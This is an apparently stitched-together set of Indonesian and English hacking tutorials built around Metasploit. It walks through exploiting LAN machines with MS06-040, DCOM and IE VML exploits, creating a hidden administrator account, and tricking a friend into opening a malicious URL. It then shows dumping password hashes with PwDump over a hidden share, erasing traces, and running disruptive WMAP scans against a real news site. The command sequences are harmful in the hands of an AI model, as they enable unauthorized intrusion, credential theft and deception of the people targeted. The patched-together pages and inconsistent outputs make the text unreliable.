Download - Tutorial it Framework- Masuk System LaN

Transcript
Page 1: Tutorial it Framework- Masuk System LaN

Instalasi Metasploit FrameworkApa itu Metasploit Framework ?

Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit framework digunakan oleh profesional bidang keamanan jaringan untuk melakukan tes penetrasi, digunakan juga oleh administrator sistem untuk memverifikasi instalasi dan patch sistemnya, vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia. Metasploit framework ditulis menggunakan bahasa pemrograman Ruby dan termasuk juga komponen lainnya yang ditulis dalam bahasa C dan assembler.

Terdiri dari apa saja?

Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload.Download

Saat ini tersedia dalam versi 3.0. Dapat didownload di halaman ini : http://framework.metasploit.com/msf/downloadInstalasi di Ubuntu

Saya tidak dapat menemukan paket metasploit ini di repositori nya Ubuntu, jadi harus mendownloadnya langsung dari website nya. Download dan simpan dalam direktori home.

Extract file hasil download:

k4tz@k4tz-desktop:~$ tar xvzf framework-3.0.tar.gz

k4tz@k4tz-desktop:~$ cd framework-3.0/

Metasploit framework versi 3.x dan yang sekarang digunakan ditulis dalam bahasa pemrograman Ruby, jadi kita memerlukan Ruby dan Librarynya. Dibawah ini instalasi Ruby dan Library yang kita perlukan.

k4tz@k4tz-desktop:~/framework-3.0$ sudo apt-get install ruby

k4tz@k4tz-desktop:~/framework-3.0$ sudo apt-get install libzlib-ruby

k4tz@k4tz-desktop:~/framework-3.0$ sudo apt-get install libopenssl-ruby

Metasploit framework sudah bisa digunakan, untuk mengeksekusi nya gunakan perintah :

k4tz@k4tz-desktop:~/framework-3.0$ sudo ./msfconsole

Password:

Page 2: Tutorial it Framework- Masuk System LaN

# # ###### ##### ## #### ###### #### # #####

## ## # # # # # ## # # # # #

# ## # ##### # # # #### ## # # # # #

# # # # ###### # ###### # # # #

# # # # # # # # ## # # # #

# # ###### # # # #### ####### #### # #

=[ msf v3.0

+ -- --=[ 176 exploits - 104 payloads

+ -- --=[ 17 encoders - 5 nops

=[ 30 aux

msf >

Sampai tahap ini metasploit berjalan OK, terkecuali jika kita ingin menggunakan dalam bentuk web nya (web interface dari metasploit). Jika kita eksekusi ./msfweb maka masih akan kita temukan eror. Coba ikut petunjuk instalasi dibawah ini dan jangan lupa sebelumnya paket apache sudah harus terinstal di sistem kita.

k4tz@k4tz-desktop:~/framework-3.0$ sudo apt-get install rubygems

k4tz@k4tz-desktop:~/framework-3.0$ sudo ./msfweb

[*] Starting msfweb v3.0 onhttp://127.0.0.1:55555/

Cannot find gem for Rails ~>1.2.2.0:

Install the missing gem with 'gem install -v=1.2.2 rails', or

change environment.rb to defineRAILS_GEM_VERSION with your desired version.

Page 3: Tutorial it Framework- Masuk System LaN

k4tz@k4tz-desktop:~/framework-3.0$ sudo gem install -v=1.2.2 rails

Bulk updating Gem source index for: http://gems.rubyforge.org

Install required dependency rake? [Yn] y

Install required dependency activesupport? [Yn] y

Install required dependency activerecord? [Yn] y

Install required dependency actionpack? [Yn] y

Install required dependency actionmailer? [Yn] y

Install required dependency actionwebservice? [Yn] y

Successfully installed rails-1.2.2

Successfully installed rake-0.7.3

Successfully installed activesupport-1.4.1

Successfully installed activerecord-1.15.2

Successfully installed actionpack-1.13.2

Successfully installed actionmailer-1.3.2

Successfully installed actionwebservice-1.2.2

Installing ri documentation for rake-0.7.3...

Installing ri documentation for activesupport-1.4.1...

Installing ri documentation for activerecord-1.15.2...

Installing ri documentation for actionpack-1.13.2...

Installing ri documentation for actionmailer-1.3.2...

Installing ri documentation for actionwebservice-1.2.2...

Installing RDoc documentation for rake-0.7.3...

Installing RDoc documentation for activesupport-1.4.1...

Installing RDoc documentation for activerecord-1.15.2...

Installing RDoc documentation for actionpack-1.13.2...

Page 4: Tutorial it Framework- Masuk System LaN

Installing RDoc documentation for actionmailer-1.3.2...

Installing RDoc documentation for actionwebservice-1.2.2...

k4tz@k4tz-desktop:~/framework-3.0$ sudo ./msfweb

[*] Starting msfweb v3.0 onhttp://127.0.0.1:55555/

=> Booting WEBrick...

=> Rails application started onhttp://127.0.0.1:55555

=> Ctrl-C to shutdown server; callwith --help for options

[2007-12-12 17:26:15] INFO WEBrick1.3.1

[2007-12-12 17:26:15] INFO ruby 1.8.5(2006-08-25) [x86_64-linux]

[2007-12-12 17:26:15] INFOWEBrick::HTTPServer#start: pid=2833 port=55555

Biarkan program msfweb berjalan di terminal, jika ingin menghentikan cukup gunakan Ctrl-C. Buka browser dan ketik di url http://127.0.0.1:55555

Page 5: Tutorial it Framework- Masuk System LaN

[TUTORIAL] METASPLOIT FRAMEWORK

http://sepri18.wordpress.com/

yg dibutuhkan:1. Tentu saja Metasploit Framework (berapapun versinya) (cari di google)2. IP Scanner ex: superscan43. Paling utama adalah Target pada jaringan LAN

langkah pertama:Scan IP target menggunakan IP Scanner. Disini target yg menggunakan port 135, karena yg paling mudah dimasukin…hiksSetelah target didapat, jalankan langkah kedua dibawah iniContoh:IP KITA : 192.168.10.8IP Target: 192.168.10.9

Langkah kedua:jalankan metasploitStart >> Program>>metasploit >>MSFConsolepraktekin code dibawah ini:

Code:

[*] Starting the Metasploit Framework…

                |                    |      _) | __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __| |   |   |  __/ |   (   |\__ \ |   | | (   | | |_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|                              _|

+ — –=[ msfconsole v2.7 [157 exploits - 76 payloads]

msf > use netapi_ms06_040msf netapi_ms06_040 > set PAYLOAD win32_bindPAYLOAD -> win32_bindmsf netapi_ms06_040(win32_bind) > set LPORT 4444LPORT -> 4444msf netapi_ms06_040(win32_bind) > set RHOST 192.168.10.9RHOST -> 10.33.196.163msf netapi_ms06_040(win32_bind) > set EXITFUNC threadEXITFUNC -> threadmsf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows 2000 target[*] Sending request…[*] Got connection from 192.168.10.8:1148 <-> 192.168.10.9:4444

Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-1999 Microsoft Corp.

Page 6: Tutorial it Framework- Masuk System LaN

C:\WINNT\system32>

jika sama dengan code diatas, berarti anda berhasil masuk ke system target.

lihat User account Komp Target:C:\WINNT\system32>net usernet user

Code:

User accounts for \\ ——————————————————————————-Administrator            Guest                   SERVER-w4w4nSERVER                    Hebat                   TsInternetUserThe command completed with one or more errors.

membuat account:contoh:user : xcodepass: 123456

C:\WINNT\system32>net user xcode 123456 /ADDnet user xcode 123456 /ADDThe command completed successfully.

Untuk jadi administrator:

C:\WINNT\system32>net localgroup administrators xcode /ADDnet localgroup administrators xcode /ADDThe command completed successfully.

jika semua sukses…- ketik C:\WINNT\system32>net usercari account yg anda buat tadi, ada apa tidak?- Jika ada, ketik C:\WINNT\system32>net user xcodepada baris bawah sendiri, apa ada tulisan:Local Group Memberships *Administrators *UsersGlobal Group memberships *NoneThe command completed successfully.

Jika ada

Page 7: Tutorial it Framework- Masuk System LaN

BackTrack 2 Final : how to make Fake Access Points with fakeap.pl

WEP Cracking tutorial , you must have been familiar with the words “Wardriving” , ” SSID” , “BSSID” , “Access Point” , etc . Now Im not going to teach you how to be on the “Attacker“-side , but it’ll be more into “Defender“-side.

Imagine that you were an administrator of the wireless network of your office , and you don’t want to find any intrusion to your wireless network , or lettin’ somebody use your Access Point without appropriate privillige , and you don’t want your boss to kick your Ass out of your job. So here it is , i will tell you one of many ways to prevent intrusions into your Access Points , in this tutorial we will try to make the attacker / wardriver gets confused by serving TONS of fake Access Points ! The attacker will see lots of Fake Available Access Points on their Scanner Tools (ex: NetStumbler or kismet) . And it will make the attackers spend more times trying to penetrate them one by one , or otherwise, they’ll just give up ! (perhaps).Requirements : - a Laptop with BackTrack 2 Final , that’ll be enough dude!Steps:1. Fire up your console , and change your wireless network interface to “master” mode by typing these commands :iwconfig eth1 mode master

2. Next , run your fakeap.pl script which is located in /pentest/wireless/fakeap-0.3.2/ by specifying parameters :perl fakeap.pl –interface -channel ex: perl fakeap.pl –interface eth1 -channel X

http://imageh4ck.com/public/pview/237/fake2.PNG

3. Then you’ll see tons of Access Points being set up by fakeap.pl :

http://imageh4ck.com/public/thumb_468d1f8795ba7619544857.jpg4. Done. have phun !

Page 8: Tutorial it Framework- Masuk System LaN

BackTrack 2 Final : Metasploit 3 how to (short introduction)

If you don’t even know what Metasploit is, Metasploit is a framework which includes a large of exploits archives inside of it therefore we could use it instantly to penetrate our vulnerable target , or we could even use Metasploit to develop a new exploit! (kewl,isn’t it ?). Instead of built independently, Metasploit ’s aslo already built on BackTrack Live CD, especially BackTrack 2 final which includes Metasploit 3 (which is the newest version of it) inside of it. Actually , Metasploit has already given the ease of its use , since Metasploit could be run on web based environment. But in this tutorial , i am not going to teach you how to use the Metasploit web environment , i am going to teach you how to use the Metasploit

3 console based. :)Well , in this tutorial , i’ll be running my Metasploit under SSH DEBIAN 4 environment

(don’t worry , you’ll be able to implement this tutorial in Windows environment too ).First of all , let’s load our ‘msfconsole’ program , which is located under /home/arie/l4m3/framework-3.0 (in my case) , it will bring you to the beginning user interface of Metasploit 3:http://imageh4ck.com/public/pview/244/2.JPGAnd then , list all available exploits in Metasploit 3 by using ’show exploits’ command :http://imageh4ck.com/public/pview/245/3.JPGChoose your desired exploit , in this case i’ll be using MSRPC DCOM exploit , use ‘use’ command to choose :http://imageh4ck.com/public/pview/246/4.JPGAfter choose the desired exploit , now you can see the list of all available payloads of the exploit , by using ’show payloads’ command :http://imageh4ck.com/public/pview/248/6.JPGTo select the payload , use the ’set PAYLOAD’ command :http://imageh4ck.com/public/pview/249/7.JPGEach payload has its own required options you have to fill , it should be RHOST (which is the target ’s ip) and LHOST (your local ip address) , example : set RHOST 10.126.134.23 , set LHOST 10.126.134.22 .after you’ve specified the required options , now just type ‘exploit’ . And Metasploit will work for you! (below is the screenshot of the failed attack , the target host’s patched i think)That’s all.

Page 9: Tutorial it Framework- Masuk System LaN

Hacking Learning with Metasploitbagi yang mau blajar hacking langsung tanya ma mas yang punya artikel di atas...makasih mas you...loe baek banget...hehehehehe

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2. Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research. Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya. Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!Pertama2 jalankan ‘mfsconsole’!

Page 10: Tutorial it Framework- Masuk System LaN

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution. This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.Untuk melihat info dari exploit ini gunakan perintah : msf > info ie_vml_rectfillExploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja ).

Untuk menggunakan exploit gunakan perintah2 berikut dalam console :msf > use_ie_vml_rectfillmsf > set PAYLOAD win32_reversemsf > set RHOST ip_targetmsf > set LHOST ip_penyerangmsf > exploit

Page 11: Tutorial it Framework- Masuk System LaN

Hasilnya akan tampak seperti gambar berikut :

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target. Crack da Password!Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil! Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

Page 12: Tutorial it Framework- Masuk System LaN

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah C:\temp\Pwdump –o pass.txt 127.0.0.1Klo berhasil akan tampak pada gambar berikut.

Lalu copy file pass.txt ke komputer kita C:\temp\copy pass.txt z:Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

Page 13: Tutorial it Framework- Masuk System LaN

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.Happy Hacking…..Beberapa saran agar windows kita tetap aman terhadap exploit diatas.1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.2. Patch Windows anda.3. Gunakan antivirus dengan update terbaru4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;pReference :http://www.metasploit.com

Page 14: Tutorial it Framework- Masuk System LaN

info hacker : Cara Hacking dengan MetasploitRasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit.Apakah itu metasploit ? Sulitkah menggunakannnya ? Saatnya membuka sedikit rahasia para Lamer (Hacker kelas teri) yang seringkali menyombongkan diri, padahal yang mereka lakukan hanyalah menggunakan tools yang dapat digunakan oleh anak SMP sekalipun.

Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer dimanfaatkan oleh teman-teman SMA saya dengan exploit terpopuler saat itu : KAHT (dimana saya tidak tertarik hacking pada waktu itu) untuk menembus Server Lab sekolah - yang akhirnya ketahuan dan dimarahi guru Lab .Feeling saya sih mereka berusaha mengambil soal ulangan yang diketik di server, dasar anak bandel, hehehe….Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini :1. Sebuah PC yang cukup bertenaga untuk virtualisasi PC.2. Metasploit Framework, dapat di download disini.3. Microsoft Windows NT SP3-6a/2000/XP/2003 yang memiliki bug pada service DCOM.4. Vmware, dapat di download disini.Vmware disini digunakan untuk membuat virtualisasi jaringan komputer, sehingga memudahkan anda yang hanya memiliki 1 PC saja dirumah.Saya akan melompati langkah-langkah menginstall VMware dan juga cara menginstall Windows di VMware, sebab apabila anda tidak mengerti hal tersebut, kemungkinan besar anda juga tidak akan paham yang kita bahas disini.Sebagai permulaan kita akan memulai dengan mengenal lebih dekat Metasploit Framework. Pada situs pembuatnya dipaparkan secara gamblang tentang apa itu Metasploit framework, dan juga tujuan penggunaannya :

What is it?The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.

What does it do?The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.Semuanya saya biarkan tertulis dalam bahasa orang bule sebab ada kata-kata yang tidak pas atau tidak bisa dipadankan bila diterjemahkan dalam Bahasa Indonesia.Selanjutnya untuk lebih jauh tentang exploit maupun bug pada DCOM service dapat anda search sendiri di google, sebab terlalu panjang jika saya jelaskan disini.Sekarang mari kita ngoprek komputer !

Page 15: Tutorial it Framework- Masuk System LaN

Langkah pertama adalah download Vmware dari situsnya, lalu anda dapat mulai menginstall Windows yang memiliki bug DCOM, kemudian jalankan windows anda di VMware !

Langkah kedua adalah download Metasploit Framework dari situsnya. Lalu install dikomputer anda dan jalankan, hingga keluar tampilan seperti berikut :

Kemudian pada kotak search ketikan dcom, lalu klik Find, dan pilihlah Exploits Microsoft RPC DCOM Interface Overflow.

Page 16: Tutorial it Framework- Masuk System LaN

Setelah itu kita memilih target yang akan kita exploitasi, dalam kasus kali ini Sistem Operasi target kita adalah Windows XP home, oleh karena itu pilihlah yang sesuai, lalu klik Forward :

Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.

Page 17: Tutorial it Framework- Masuk System LaN

Langkah berikutnya kita harus menentukan Target Address kita, disini saya telah mengkonfigurasi Windows XP Home di Vmware dengan IP 192.168.126.132, oleh karena itu tuliskan ip tersebut pada kolom RHOST. Sedangkan RPORT disini sudah ditentukan yaitu port 135 yang merupakan port default dari service DCOM dimana secara default dibuka oleh Windows XP Home ! Wah, berbahaya sekali yah… Untuk LPORT disini juga sudah ditentukan yaitu 4444, Local Port akan membuka sebuah port di PC anda untuk berhubungan dengan komputer target. Selanjutnya klik Forward .

Setelah semua konfigurasi selesai, anda akan mendapatkan pesan konfirmasi seperti berikut, jika anda yakin semuanya telah benar,lanjutkan dengan klik Apply.

Page 18: Tutorial it Framework- Masuk System LaN

Jika target berhasil terexploitasi, anda akan mendapatkan sebuah session yang berisi target hacking kita dan siap untuk di double klik.

Kemudian anda akan mendapati sebuah layar Command Prompt dari komputer target dan anda sebagai Administrator. Jika sudah begini semua terserah anda, jangan tanyakan apa yang bisa dilakukan selanjutnya.Dan selesailah tutorial hacking kali ini Mudah bukan ?

Page 19: Tutorial it Framework- Masuk System LaN

WMAP: Metasploit + RatProxy + SQlite3Filed under: Exploit, Tips 'n Trick, Tools Review, Websecurity — byteskrew @ 4:12 am

Mungkin masih ada yang belum tahu bahwa metasploit saat ini mendukung cukup banyak feature, salah satunya adalah wmap. WMAP merupakan web application framework yang digunakan untuk proses scanning suatu website dengan memanfaatkan metasploit framework. WMAP sendiri masih terbilang baru sehingga masih banyak hal-hal yang belum ditambahkan, proses scanning pun masih dilakukan dengan cara sederhana namun konsepnya cukup baik sehingga kita dapat ikut melakukan kustomisasi terhadap modul-moudul yang akan digunakan.

Dokumentasi mengenai WMAP dapat ditemukan pada paket Metasploit, atau bisa dilihat langsung secara online disini. Dan seperti biasa, kita akan mulai pembahasan dari konsep hingga implementasi.

Bagi kalian yang terbiasa melakukan audit ataupun scanning terhadap suatu aplikasi web pasti sudah terbiasa dengan istilah spider. Web scanner umumnya memiliki kemampuan untuk mengumpulkan informasi sebanyak-banyaknya dari target melalui seluruh link yang ditemukan mulai dari halaman index hingga halaman-halaman terdalam lainnya. Web scanner tersebut akan melakukan audit terhadap link-link yang ditemukan dan dicocokan hasilnya dengan informasi vulnerability dalam database tools tersebut. WMAP pada metasploit bekerja dengan metode yang mirip namun memanfaatkan aplikasi-aplikasi opensource.

WMAP merupakan salah satu plugin (yup, salah satu, masih ada beberapa plugin lainnya) metasploit yang dapat di load pada msfconsole dimana melalui msfconsole tersebut user dapat berinteraksi dengan metasploit framework. Berikut ini konsep WMAP pada metasploit:

1. RatProxy

Page 20: Tutorial it Framework- Masuk System LaN

Metasploit memanfaatkan RatProxy sebagai proxy yang akan menangkap seluruh data request-response antara web client dengan web server. Informasi tersebut akan dimasukan ke suatu database (sqlite3) untuk kemudian digunakan oleh modul-modul WMAP. RatProxy sendiri merupakan hasil karya hacker Michal Zalewski yang merupakan opensource tools untuk audit web application. RatProxy tidak memiliki dukungan terhadap penyimpanan data kedalam bentuk database, oleh karena itu sebelum dapat digunakan oleh WMAP maka RatProxy harus di-patch terlebih dahulu. Patch bisa didapatkan dari bundle metasploit: external/ratproxy/ratproxy_wmap.diff

2. SQLite3

SQLite merupakan produk database yang diklaim small, fast, reliable. SQLite umumnya digunakan oleh aplikasi-aplikasi yang membutuhkan database sebagai tempat penyimpanan dan pemrosesan data yang sederhana. Contoh penggunaannya adalah pada iPhone dimana sqlite digunakan untuk menyimpan data SMS. Metasploit sendiri memiliki driver yang dapat berkomunikasi dengan 3 produk database, MySQL, PostgreSQL, dan SQlite3. Implementasi WMAP memanfaatkan SQLite3.

3. WMAP

WMAP merupakan plugin metasploit untuk web application framework audit. Saat tulisan ini dibuat versi stable metasploit adalah 3.2, dan modul-modul yang dapat digunakan oleh WMAP antara lain: WMAPScanServer, WMAPScanDir, WMAPScanUniqueQuery, dll.

Jika kalian menggunakan Backtrack 3 final, maka support terhadap metasploit sudah sangat baik. Requirement yang dibutuhkan oleh metasploit telah terpenuhi dan plugin-pluginnya dapat di-load dengan mudah. Namun beberapa sistem operasi lain umumnya membutuhkan beragam metode sebelum dapat memanfaatkan feature-feature pada metasploit framework. Untuk plugin WMAP ini, seperti yang telah disebutkan diatas, dibutuhkan RatProxy dan SQlite3 berjalan dengan baik sebelum me-load WMAP. Pada contoh dibawah ini saya menggunakan sistem operasi OS X yang membutuhkan beberapa data tambahan untuk memuaskan persayaratan yang dibutuhkan oleh WMAP, diantaranya yang terpenting dibutuhkan flare khusus (bukan bawaan dari RatProxy) yang kompatibel dengan MacOSX. Flare merupakan tools yang digunakan untuk proses decompiler action script flash.

(1). Buat database wmap_test.db melalui plugin database metasploit

msf > db_create /Users/staff/wmap_test.db[*] Creating a new database instance...[*] Successfully connected to the database[*] File: /Users/staff/wmap_test.db

(2). Bagi kalian yang memiliki rasa penasaran tinggi tentu ingin melihat seperti apa bentuk database yang dibuat oleh plugin database metasploit tersebut. Database yang telah dibuat dapat kita lihat schema-nya secara langsung menggunakan SQLite.

k-elektronik:~ staff$ sqlite3 wmap_test.dbSQLite version 3.4.0Enter ".help" for instructionssqlite> .tableshosts       refs        requests    targets     vulns_refsnotes       reports     services    vulns sqlite> .schema requests

Page 21: Tutorial it Framework- Masuk System LaN

CREATE TABLE requests ('host' VARCHAR(20),'port' INTEGER,'ssl' INTEGER,'meth' VARCHAR(20),'path' BLOB,'headers' BLOB,'query' BLOB,'body' BLOB,'respcode' VARCHAR(5),'resphead' BLOB,'response' BLOB,'created' TIMESTAMP);

(3). Setelah urusan database selesai, maka selanjutnya menjalankan aplikasi RatProxy yang sebelumnya telah di-patch agar dapat menyimpan seluruh data request-response ke database wmap_test.db

k-elektronik:ratproxy staff$ ./ratproxy -v /Users/staff/ -b wmap_test.db -d detik.com -xtifkgmjscael2XCrratproxy version 1.51-beta by <[email protected]>[*] Proxy configured successfully. Have fun, and please do not be evil.WARNING: Disruptive tests enabled. use with care.[+] Accepting connections on port 8080/tcp (any source)...

(4). RatProxy diatas menggunakan port default, yaitu 8080. Yang berarti pada mesin tersebut dibuka port 8080 dan akan bertindak sebagai proxy server. Sisanya adalah kita melakukan browsing secara manual ataupun menggunakan automatic tools dengan memanfaatkan port 8080 itu sebagai proxy server. Hasil dari browsing seluruhnya akan di log oleh RatProxy kedalam database wmap_test.db

(5). Sekali lagi, bagi yang penasaran apakah RatProxy benar-benar menyimpan hasilnya pada database yang telah kita buat sebelumnya, dapat memanfaatkan sqlite3.

sqlite> select host,meth,headers from requests;202.158.66.94|GET|User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-usAccept-Encoding: gzip, deflateCookie: __utma=146380193.1809118446.1213005860.1213005860.1213005860.1Connection: keep-aliveProxy-Connection: keep-aliveHost: detik.com 202.158.66.94|GET|User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1Referer: http://detik.com/Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateCookie: __utma=146380193.1809118446.1213005860.1213005860.1213005860.1Connection: keep-aliveProxy-Connection: keep-aliveHost: detik.com

Page 22: Tutorial it Framework- Masuk System LaN

(6). Berikutnya kita akan melihat bagaimana wmap bekerja. Pada langkah pertama tadi kita telah membuat database wmap_test.db melalui msfconsole sekaligus connect ke database tersebut secara otomatis menggunakan plugin db_sqlite3. Maka selanjutnya yang dibutuhkan adalah load plugin wmap untuk kemudian membaca database wmap_test.db tersebut.

msf > load db_wmap[*] =[ WMAP v0.3 - ET LoWNOISE[*] Successfully loaded plugin: db_wmapmsf > wmap_targets -p[*] Id. Host Port SSL[*] Done.msf > wmap_targets -r <<< Ini salah satu langkah penting, sebelum print target, harus reload terlebih dahulu.[*] Added. 202.158.66.94 80 0[*] Added. 202.158.66.164 80 0[*] Added. 202.158.66.86 80 0[*] Added. 202.158.66.20 80 0[*] Added. 202.158.66.190 80 0[*] Added. 202.158.66.54 80 0[*] Added. 202.158.66.24 80 0[*] Added. 64.233.183.127 80 0msf > wmap_targets -p << target berikut ini hasil browsing via web browser ke situs detik.com[*] Id. Host Port SSL[*] 1. 202.158.66.94 80[*] 2. 202.158.66.164 80[*] 3. 202.158.66.86 80[*] 4. 202.158.66.20 80[*] 5. 202.158.66.190 80[*] 6. 202.158.66.54 80[*] 7. 202.158.66.24 80[*] 8. 64.233.183.127 80[*] Done. msf > wmap_targets -s 1 msf > wmap_targets -p[*] Id. Host Port SSL[*] => 1. 202.158.66.94 80[*] 2. 202.158.66.164 80[*] 3. 202.158.66.86 80[*] 4. 202.158.66.20 80[*] 5. 202.158.66.190 80[*] 6. 202.158.66.54 80[*] 7. 202.158.66.24 80[*] 8. 64.233.183.127 80[*] Done.msf > wmap_website[*] Website structure[*] 202.158.66.94:80 SSL:0ROOT_TREE+------favicon.ico| js| +------swfobject.js| +------openwin11.js| +------etc.js| +------expandbannerall.js.html| +------contentslider.js| +------tabcontent.js

Page 23: Tutorial it Framework- Masuk System LaN

